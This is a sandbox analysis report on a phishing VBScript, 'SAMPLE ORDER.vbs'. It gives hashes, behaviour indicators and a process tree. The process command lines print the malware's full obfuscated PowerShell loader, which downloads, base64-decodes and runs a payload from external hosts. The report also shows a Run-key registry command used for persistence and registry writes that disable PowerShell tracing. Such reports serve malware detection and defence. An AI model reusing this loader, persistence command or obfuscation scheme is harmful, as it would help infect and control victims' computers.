File name:

SAMPLE ORDER.vbs

Full analysis: https://app.any.run/tasks/23384be5-bfdf-49b2-9e04-492b279d2c99
Verdict: Malicious activity
Analysis date: August 22, 2024, 06:23:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

ADEE037A2A0E36129B2A9FB5F0413648

SHA1:

6F80D6F569CD259472712D3C705E2BF56F821620

SHA256:

E2EDE61AE4FA068D90A785DFC7D1F7FCC8980B2ECF9E4263F7822D78023FEAA2

SSDEEP:

192:i7+7NyxeeDS0Kyfi2ZYNHAYSj+nMs6ZPv7L6v/EfzB1WKikyawhI7c2kBN3gW3CW:i+7WLDSzyaMEgRyMs6h7G3ELf+mslx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 3028)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6764)
      • powershell.exe (PID: 6340)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6764)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1488)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1488)
      • wab.exe (PID: 4760)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1488)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 1488)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 4760)

    • Reads the date of Windows installation

      • wab.exe (PID: 4760)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1164)

  • INFO

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1488)

    • Disables trace logs

      • powershell.exe (PID: 6340)

    • Checks proxy server information

      • powershell.exe (PID: 6340)
      • wab.exe (PID: 4760)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1488)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6764)
      • powershell.exe (PID: 6340)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1488)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1488)

    • Checks supported languages

      • wab.exe (PID: 4760)

    • Process checks computer location settings

      • wab.exe (PID: 4760)

    • Reads the computer name

      • wab.exe (PID: 4760)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
144
Monitored processes
10
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs wab.exe no specs cmd.exe no specs conhost.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
1164"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Entreindtgterne49" /t REG_EXPAND_SZ /d "%Rsonnables% -w 1 $Middagsselskabers=(Get-ItemProperty -Path 'HKCU:\Lgnernes\').Spreathed;%Rsonnables% ($Middagsselskabers)"C:\Windows\SysWOW64\cmd.exewab.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1488"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Scrooping='SUBsTR';$Latterliggjorde35++;}$Scrooping+='ing';Function Creophagia($Afvrgelser){$Emarginated=$Afvrgelser.Length-$Latterliggjorde35;For( $Skold=4;$Skold -lt $Emarginated;$Skold+=5){$Cutlery+=$Afvrgelser.$Scrooping.'Invoke'( $Skold, $Latterliggjorde35);}$Cutlery;}function Tropers($Wanly){ .($Phenacyl) ($Wanly);}$charting=Creophagia 'StriMAngioA,trzSpiriSo.jl.onvlInt.a hel/ Mos5 Kul.Opf 0Decu Slam(Bro,W S,oiBacknGeomd.elvoAvlewVrkss,fst FataNForfTH,re Neg1Otte0Anlb.Trst0Send; Lec uniW A ai hynn Co.6Zone4 Fed; Ly. .ovexaero6Frla4 T.l;Or,h utr Blavsten:Selv1 onf2Post1Kopi.unla0C.an)Fo.v SqueG onueR,gacNon.kRek oHal /Ka m2,eot0Unpr1Sgek0goos0Drag1Opko0A st1Holo SnvlFIndei.onsrSmileForhfpo.no,ammxrebl/ Myr1.tem2Sydv1Unde. Ep.0Utro ';$Whippets=Creophagia ' SepUMyrvsSerieUhmmrNytt-PoetAGispgByplePolyn,rottSuss ';$Spelt=Creophagia 'Sheeh.emitParatndrip.agpsGlam: Dif/Komm/I,dgaLimotStivePtosr BeseOpblc Mn i.oopeSaarrFolkaRa.pi.lass ous.Oever Rasukmme.RecrcUst.oBasimNonp/he.dwTeorpAlis-ShiniSkylnVi tc Stal lycuSuped Dkne,obss .yk/ PauiO,eamF,tngOuts/St tTPen.eM,sosCaritOldsa MonmRebee,ntenTomjt eldDirtjI pirDopi.JoshsPor nCupupSand>granh Hu t fo,t ,olpHan.:Ca.r/U ba/UndiaRo,tmdertbSam.yHel.vAge,e B,rrS recPer.eNeu .,eauc nteoJulemMili/SalpTU.maeSk usLawlt outa Infm UnceSystnJau tTracd CabjFlexrVens.,emisHydrnSalip av ';$Sjalers=Creophagia 'indt>regn ';$Phenacyl=Creophagia 'SursiMedgeOverxFlag ';$Lovelier='Benzintankstation';$Skoldnviousness = Creophagia 'Inare.arccSvajhTin.o F,s Expu%,ezcaF imp Re.pTredd Po a.mprtHo,ea Una%Rikk\RgfaEOprrk .ansNrt.kAntil.rveuUndedLoqueResirUlemiPrefnH,lpg raneHeberKly.n ippe,uit1T,pt8Rigs0.rac.RigiSUnc,lSimuuKlpu Anag&Unvi&Flod Lit.eGithcE tihNon oV.ri malltU,so ';Tropers (Creophagia 'Semi$ IndgNedel.arto.esubBrera Manl Gru: BarUmirrnHydacSmerrKathaFagrmRrin=Fupm(TrancAniem .egd Liz Lsla/NephcFeif Ridd$ProdSSpackMahzoAfp,lDet dT,ilnDeervAssyiflagoRefiu BissStvlnJaveeAkens PalsBals)Unc, ');Tropers (Creophagia ',nju$NemmgRettl,bbroCaimbAfloaAalelNick:WomaURdj,dcinqm De,aKagen Vrivvan rKo te SerrEs hiMo un R,ngPart=Elec$ApodS hslpFol.eSydslSkjotKo,p.SstesLedepFo,slBev.i DeltHybr(Spir$GiftSdoodjTogla Slulpun.e Intr,dbasBobi),enc ');Tropers (Creophagia 'Klag[AstaNkapienonmtUrvr. Bj.SDisceStryrRcv vMod iRegecAlace MonPMulto poiiSlagnEju.t .ntM FysaI ron TreadelsgDisbeCalirI,se] lem:vodu:DdshSKanaeLenscU.deuandarUnc.i,atitEkspyDissPCir r nebo KlitVa,io Or cFre o P nlplot Cott=Flsk Muf[StedN MaeeTthetGrue.C alS oxyeDunjcOrkau earBesmiScrotIbr.y acrPzygorC,cloTryktI.fioEasec ChaoRevol S.pTadmoyAna pSoleeDepi]Grun:Tyve:DamkT GenlOp.asAfb,1Jage2Meta ');$Spelt=$Udmanvrering[0];$Skoldmpotens= (Creophagia 'Brug$CacogKampl B.noIns,bRoskaLovtlPlat:d.izD Afsi rudsUn.dcPetrl coeoOmstsOutbu emirConse Ba.=mephNAmageTu.swKeel- Th,OCassbrolfjLicue Vricfri,tunp S daSSk rySubssLyditBib,eRu,im ub.FrimNStrae totHe,b.SeptWxante N.tbEvneCt.velChaui,anteTerrnlotot');$Skoldmpotens+=$Uncram[1];Tropers ($Skoldmpotens);Tropers (Creophagia 'Me s$FaneD .ati JydsMolec MetlU,deoowass St.u D,rrFanteKred.Va.dHI.omeRamoa.adddDataeDebarVagisr,th[Acid$CoopW Norh RopiUna.pNummpadm eDishtFamisOpfi]Sati=Ford$ nuc SsthM traProtrBaggt .riilselnS,nng Tom ');$Ninetyseven=Creophagia 'Fest$ TakDSuspi RaisReshcBalsl Spoo HazsEmbruKararElskeJo,g.JustDJaw.oTsa,wOkulnblaslUdtyooptaaAa ndIndsFNonpi A tlPupueCosi( Cer$ForbSP.aspRelieEnt,lUt,atHigh, oha$De oBBed.umuhanBod,kScene nder.odsyD en)repr ';$Bunkery=$Uncram[0];Tropers (Creophagia 'Slab$UltrgSer,lAmalo,lutb H,naLig l Lep:UdryHudliu bram erbbTi.euJazzgOutsgPl,neDel.rJot,sCuar= ris(Plu.Tspere.epasUmptt Bee- lymPQuayaL bitIntahRess Mutt$ Ac,B AltuDistnUdenkValgeLe srFreqyFjrt)Obar ');while (!$Humbuggers) {Tropers (Creophagia 'Sili$AndegTrstlBel oSvupb S oaUri lCons:Sor.VBahrestrinKa,rgNetfePoly=Shin$Sup tEkspr In.u K seChem ') ;Tropers $Ninetyseven;Tropers (Creophagia 'Br dS.lletDo,aaRevlr Erst pr-,entSS.nil b ee rateTur pPode Supp4S ra ');Tropers (Creophagia 'Knle$MetagSto,l HaaoSo,hbRetsaBroal,urf:Or rH.leiuBevim vabFunkuO.eog subgSalgeSor.r Unws ru= M.l(Tr dTMettePr.dsWorstOmlb- In,PS.lva .crtFinghSa,a ge l$S tdB BeguFogenOmplkDecieUrolrKenwyPoli) Dep ') ;Tropers (Creophagia '.tar$DiscgEreclM.quoAxodbBobla AmblAsne:,oloTBusbiMel lVi ltExteaLipogC.mbeDiskr Ov,= pr.$ B.agVaa lLam.oTetrbIls,a ritl har: SupnAuste BepbCapsu,roslHydra Ti.eDero+.kbn+Bubo%F,re$Kva UCanadCaptmDestaLatenLse.vK.rtrpau eSph ra,taiSpecnBrohgLens.Int,cS,epoGadeu St,nsufft Sat ') ;$Spelt=$Udmanvrering[$Tiltager];}$Blackwasher=346457;$Alkynes=27968;Tropers (Creophagia 'Basb$Baskg O.tlDampo,adib SchaPyrolTnde: DisB FakeAnkekAe orT.staFlaaefuldfStudtBetoeAme sProv Bnks=desi UdgrGPr peLenctAbst-SaneC TytoM,stnUdmatPense,addn etat Non Tran$ At BMedtuApprnLingkcarle TvurBrobyMagn ');Tropers (Creophagia ' Spi$OvergI,pulinaroCr.ib T,naVes.lWors:BedaUT chnNignc Anno mobm WrypS.xfeSemitme.si DestCarriUn,ovBevaeIslenEquie MersTegnsOver shoo=Fisk S rv[GlosS ley.iblsCalat Fine orem.ndu.SgetC IndoForkn.upev,iseeK rtrCalatBlo ]Der,:Sgel:SpisF CenrMikroukonmbudsBSydla ass MoreHol,6Sy.p4PattS hantCommrFrisi DisnUtmmgAdre(Alpe$tuliB Ov e olkkOve r aedaDurieToucfProatPriseFluosV,ll)P.la ');Tropers (Creophagia '.uld$ AfsgP,umlBijeoAcrobVissaP.illCa.o: GamTHestaListlBagteTilbgovera LumvRoboeKlg rMis n pre Hoo Shor=P.is Impl[ CraS.mbayIntesSamstMilieTrafmSlik.Udd,TPerie L,mx VoutTigh.FilmEArchnarthcV tio Fy,dFroniSextn HydgCiti]Mach:Til,: .ouAAcalSinchCAn oITotaI H.i.Fl,kGskreeslbetChloSKlovt OverNedsiDe tn ForgDupl(Apo $EvenUDekonsoluc,hatoerstmkabip.onoe Soctm daiCabbt ScyiF,apvSammedestnPaadePatrs Bess Sni)Aa.e ');Tropers (Creophagia 'Prog$.ntrgIndulP.rfo SirbFrdsaS nol E u:ForsSMukkgKalke kn.sGlu t Ou.iBeareForkr Kaan zapeKri sMet,=Astu$ BanTL.knaDk.blFul.eS.augArbeaDisavEgoteAe or avenUnsoe,ler.e.stsS.rsuVietbEme.sOpretCos,rStoei arn B,ogBe o(Gave$ NigB DeilTonea R ncMo okEnk.wDis aReins,uvnh,onde SmdrAffo,.elp$Cav,AShabl MarkPhoryIlian Prie BlosColl)Cr,s ');Tropers $Sgestiernes;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3028REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Entreindtgterne49" /t REG_EXPAND_SZ /d "%Rsonnables% -w 1 $Middagsselskabers=(Get-ItemProperty -Path 'HKCU:\Lgnernes\').Spreathed;%Rsonnables% ($Middagsselskabers)"C:\Windows\SysWOW64\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
4760"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
6340"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Scrooping='SUBsTR';$Latterliggjorde35++;}$Scrooping+='ing';Function Creophagia($Afvrgelser){$Emarginated=$Afvrgelser.Length-$Latterliggjorde35;For( $Skold=4;$Skold -lt $Emarginated;$Skold+=5){$Cutlery+=$Afvrgelser.$Scrooping.'Invoke'( $Skold, $Latterliggjorde35);}$Cutlery;}function Tropers($Wanly){ .($Phenacyl) ($Wanly);}$charting=Creophagia 'StriMAngioA,trzSpiriSo.jl.onvlInt.a hel/ Mos5 Kul.Opf 0Decu Slam(Bro,W S,oiBacknGeomd.elvoAvlewVrkss,fst FataNForfTH,re Neg1Otte0Anlb.Trst0Send; Lec uniW A ai hynn Co.6Zone4 Fed; Ly. .ovexaero6Frla4 T.l;Or,h utr Blavsten:Selv1 onf2Post1Kopi.unla0C.an)Fo.v SqueG onueR,gacNon.kRek oHal /Ka m2,eot0Unpr1Sgek0goos0Drag1Opko0A st1Holo SnvlFIndei.onsrSmileForhfpo.no,ammxrebl/ Myr1.tem2Sydv1Unde. Ep.0Utro ';$Whippets=Creophagia ' SepUMyrvsSerieUhmmrNytt-PoetAGispgByplePolyn,rottSuss ';$Spelt=Creophagia 'Sheeh.emitParatndrip.agpsGlam: Dif/Komm/I,dgaLimotStivePtosr BeseOpblc Mn i.oopeSaarrFolkaRa.pi.lass ous.Oever Rasukmme.RecrcUst.oBasimNonp/he.dwTeorpAlis-ShiniSkylnVi tc Stal lycuSuped Dkne,obss .yk/ PauiO,eamF,tngOuts/St tTPen.eM,sosCaritOldsa MonmRebee,ntenTomjt eldDirtjI pirDopi.JoshsPor nCupupSand>granh Hu t fo,t ,olpHan.:Ca.r/U ba/UndiaRo,tmdertbSam.yHel.vAge,e B,rrS recPer.eNeu .,eauc nteoJulemMili/SalpTU.maeSk usLawlt outa Infm UnceSystnJau tTracd CabjFlexrVens.,emisHydrnSalip av ';$Sjalers=Creophagia 'indt>regn ';$Phenacyl=Creophagia 'SursiMedgeOverxFlag ';$Lovelier='Benzintankstation';$Skoldnviousness = Creophagia 'Inare.arccSvajhTin.o F,s Expu%,ezcaF imp Re.pTredd Po a.mprtHo,ea Una%Rikk\RgfaEOprrk .ansNrt.kAntil.rveuUndedLoqueResirUlemiPrefnH,lpg raneHeberKly.n ippe,uit1T,pt8Rigs0.rac.RigiSUnc,lSimuuKlpu Anag&Unvi&Flod Lit.eGithcE tihNon oV.ri malltU,so ';Tropers (Creophagia 'Semi$ IndgNedel.arto.esubBrera Manl Gru: BarUmirrnHydacSmerrKathaFagrmRrin=Fupm(TrancAniem .egd Liz Lsla/NephcFeif Ridd$ProdSSpackMahzoAfp,lDet dT,ilnDeervAssyiflagoRefiu BissStvlnJaveeAkens PalsBals)Unc, ');Tropers (Creophagia ',nju$NemmgRettl,bbroCaimbAfloaAalelNick:WomaURdj,dcinqm De,aKagen Vrivvan rKo te SerrEs hiMo un R,ngPart=Elec$ApodS hslpFol.eSydslSkjotKo,p.SstesLedepFo,slBev.i DeltHybr(Spir$GiftSdoodjTogla Slulpun.e Intr,dbasBobi),enc ');Tropers (Creophagia 'Klag[AstaNkapienonmtUrvr. Bj.SDisceStryrRcv vMod iRegecAlace MonPMulto poiiSlagnEju.t .ntM FysaI ron TreadelsgDisbeCalirI,se] lem:vodu:DdshSKanaeLenscU.deuandarUnc.i,atitEkspyDissPCir r nebo KlitVa,io Or cFre o P nlplot Cott=Flsk Muf[StedN MaeeTthetGrue.C alS oxyeDunjcOrkau earBesmiScrotIbr.y acrPzygorC,cloTryktI.fioEasec ChaoRevol S.pTadmoyAna pSoleeDepi]Grun:Tyve:DamkT GenlOp.asAfb,1Jage2Meta ');$Spelt=$Udmanvrering[0];$Skoldmpotens= (Creophagia 'Brug$CacogKampl B.noIns,bRoskaLovtlPlat:d.izD Afsi rudsUn.dcPetrl coeoOmstsOutbu emirConse Ba.=mephNAmageTu.swKeel- Th,OCassbrolfjLicue Vricfri,tunp S daSSk rySubssLyditBib,eRu,im ub.FrimNStrae totHe,b.SeptWxante N.tbEvneCt.velChaui,anteTerrnlotot');$Skoldmpotens+=$Uncram[1];Tropers ($Skoldmpotens);Tropers (Creophagia 'Me s$FaneD .ati JydsMolec MetlU,deoowass St.u D,rrFanteKred.Va.dHI.omeRamoa.adddDataeDebarVagisr,th[Acid$CoopW Norh RopiUna.pNummpadm eDishtFamisOpfi]Sati=Ford$ nuc SsthM traProtrBaggt .riilselnS,nng Tom ');$Ninetyseven=Creophagia 'Fest$ TakDSuspi RaisReshcBalsl Spoo HazsEmbruKararElskeJo,g.JustDJaw.oTsa,wOkulnblaslUdtyooptaaAa ndIndsFNonpi A tlPupueCosi( Cer$ForbSP.aspRelieEnt,lUt,atHigh, oha$De oBBed.umuhanBod,kScene nder.odsyD en)repr ';$Bunkery=$Uncram[0];Tropers (Creophagia 'Slab$UltrgSer,lAmalo,lutb H,naLig l Lep:UdryHudliu bram erbbTi.euJazzgOutsgPl,neDel.rJot,sCuar= ris(Plu.Tspere.epasUmptt Bee- lymPQuayaL bitIntahRess Mutt$ Ac,B AltuDistnUdenkValgeLe srFreqyFjrt)Obar ');while (!$Humbuggers) {Tropers (Creophagia 'Sili$AndegTrstlBel oSvupb S oaUri lCons:Sor.VBahrestrinKa,rgNetfePoly=Shin$Sup tEkspr In.u K seChem ') ;Tropers $Ninetyseven;Tropers (Creophagia 'Br dS.lletDo,aaRevlr Erst pr-,entSS.nil b ee rateTur pPode Supp4S ra ');Tropers (Creophagia 'Knle$MetagSto,l HaaoSo,hbRetsaBroal,urf:Or rH.leiuBevim vabFunkuO.eog subgSalgeSor.r Unws ru= M.l(Tr dTMettePr.dsWorstOmlb- In,PS.lva .crtFinghSa,a ge l$S tdB BeguFogenOmplkDecieUrolrKenwyPoli) Dep ') ;Tropers (Creophagia '.tar$DiscgEreclM.quoAxodbBobla AmblAsne:,oloTBusbiMel lVi ltExteaLipogC.mbeDiskr Ov,= pr.$ B.agVaa lLam.oTetrbIls,a ritl har: SupnAuste BepbCapsu,roslHydra Ti.eDero+.kbn+Bubo%F,re$Kva UCanadCaptmDestaLatenLse.vK.rtrpau eSph ra,taiSpecnBrohgLens.Int,cS,epoGadeu St,nsufft Sat ') ;$Spelt=$Udmanvrering[$Tiltager];}$Blackwasher=346457;$Alkynes=27968;Tropers (Creophagia 'Basb$Baskg O.tlDampo,adib SchaPyrolTnde: DisB FakeAnkekAe orT.staFlaaefuldfStudtBetoeAme sProv Bnks=desi UdgrGPr peLenctAbst-SaneC TytoM,stnUdmatPense,addn etat Non Tran$ At BMedtuApprnLingkcarle TvurBrobyMagn ');Tropers (Creophagia ' Spi$OvergI,pulinaroCr.ib T,naVes.lWors:BedaUT chnNignc Anno mobm WrypS.xfeSemitme.si DestCarriUn,ovBevaeIslenEquie MersTegnsOver shoo=Fisk S rv[GlosS ley.iblsCalat Fine orem.ndu.SgetC IndoForkn.upev,iseeK rtrCalatBlo ]Der,:Sgel:SpisF CenrMikroukonmbudsBSydla ass MoreHol,6Sy.p4PattS hantCommrFrisi DisnUtmmgAdre(Alpe$tuliB Ov e olkkOve r aedaDurieToucfProatPriseFluosV,ll)P.la ');Tropers (Creophagia '.uld$ AfsgP,umlBijeoAcrobVissaP.illCa.o: GamTHestaListlBagteTilbgovera LumvRoboeKlg rMis n pre Hoo Shor=P.is Impl[ CraS.mbayIntesSamstMilieTrafmSlik.Udd,TPerie L,mx VoutTigh.FilmEArchnarthcV tio Fy,dFroniSextn HydgCiti]Mach:Til,: .ouAAcalSinchCAn oITotaI H.i.Fl,kGskreeslbetChloSKlovt OverNedsiDe tn ForgDupl(Apo $EvenUDekonsoluc,hatoerstmkabip.onoe Soctm daiCabbt ScyiF,apvSammedestnPaadePatrs Bess Sni)Aa.e ');Tropers (Creophagia 'Prog$.ntrgIndulP.rfo SirbFrdsaS nol E u:ForsSMukkgKalke kn.sGlu t Ou.iBeareForkr Kaan zapeKri sMet,=Astu$ BanTL.knaDk.blFul.eS.augArbeaDisavEgoteAe or avenUnsoe,ler.e.stsS.rsuVietbEme.sOpretCos,rStoei arn B,ogBe o(Gave$ NigB DeilTonea R ncMo okEnk.wDis aReins,uvnh,onde SmdrAffo,.elp$Cav,AShabl MarkPhoryIlian Prie BlosColl)Cr,s ');Tropers $Sgestiernes;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6464\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6468"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ekskluderingerne180.Slu && echo t"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
6764"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SAMPLE ORDER.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6812"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ekskluderingerne180.Slu && echo t"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
6920\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
13 925
Read events
13 892
Write events
33
Delete events
0

Modification events

(PID) Process:(6764) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6764) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6764) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6764) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(6340) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
0
Suspicious files
2
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
6340powershell.exeC:\Users\admin\AppData\Roaming\Ekskluderingerne180.Slutext
MD5:E6C9F630525B15F12D6E5303BAAD1EB4
SHA256:A2F29B2C3C5DA87D13B112BE48CC1346DD11299E1CF0C292E9ABF6E4F93C2A4E
6340powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l1hz55hx.ltc.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1488powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xifidozt.nnq.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
